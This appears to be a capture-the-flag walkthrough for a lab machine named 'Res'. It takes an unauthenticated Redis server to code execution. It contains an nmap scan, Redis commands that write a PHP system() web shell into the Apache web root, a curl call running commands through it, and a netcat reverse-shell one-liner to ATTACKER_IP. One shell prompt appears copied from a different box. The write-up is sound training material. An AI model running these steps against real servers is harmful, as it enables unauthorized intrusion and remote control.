Res
Box Description
Hack into a vulnerable database server with an in-memory data-structure in this semi-guided challenge!
NMAP
- [HTTP: 80] [Redis: 6379]
Nmap scan report for 10.10.150.201
Host is up (0.086s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
6379/tcp open redis Redis key-value store 6.0.7
REDIS
Path RequiredRedis Server Requires no Authentication.
- We know the Default
Apache2Site Folder:/var/www/html - We can set some parameters to create a
WebShell
attacker@machine:~$ redis -h 10.10.150.201
10.10.150.201:6379> config set dir /var/www/html
OK
10.10.150.201:6379> config set dbfilename web_shell.php
OK
10.10.150.201:6379> set test "<?php system($_GET['cmd']);?>"
OK
10.10.150.201:6379> save
OK
┌───────────────┐ ┌───────────────────────────────┐
| web_shell.php | -► | <?php system($_GET['cmd']);?> |
└───────────────┘ └───────────────────────────────┘
- We can Access the
WebShellat: [IP:80/web_shell.php]
aubreanna@internal:~$ curl "http://10.10.150.201/web_shell.php?cmd=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
- Executing Commands from the
WebShell
┌─────────────────────────┐ ┌─────────┐ ┌─────────────┐
| IP:web_shell.php?cmd=id | -► | ?cmd=id | -► | COMMAND: id |
└─────────────────────────┘ └─────────┘ └─────────────┘
- PAYLOAD [URL Encoded]
┌───────────────────────────────────────────────────────────────────────────┐ ┌─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┐
| rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ATTACKER_IP 4444 >/tmp/f | -► | rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20ATTACKER_IP%204444%20%3E%2Ftmp%2Ff |
└───────────────────────────────────────────────────────────────────────────┘ └─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┘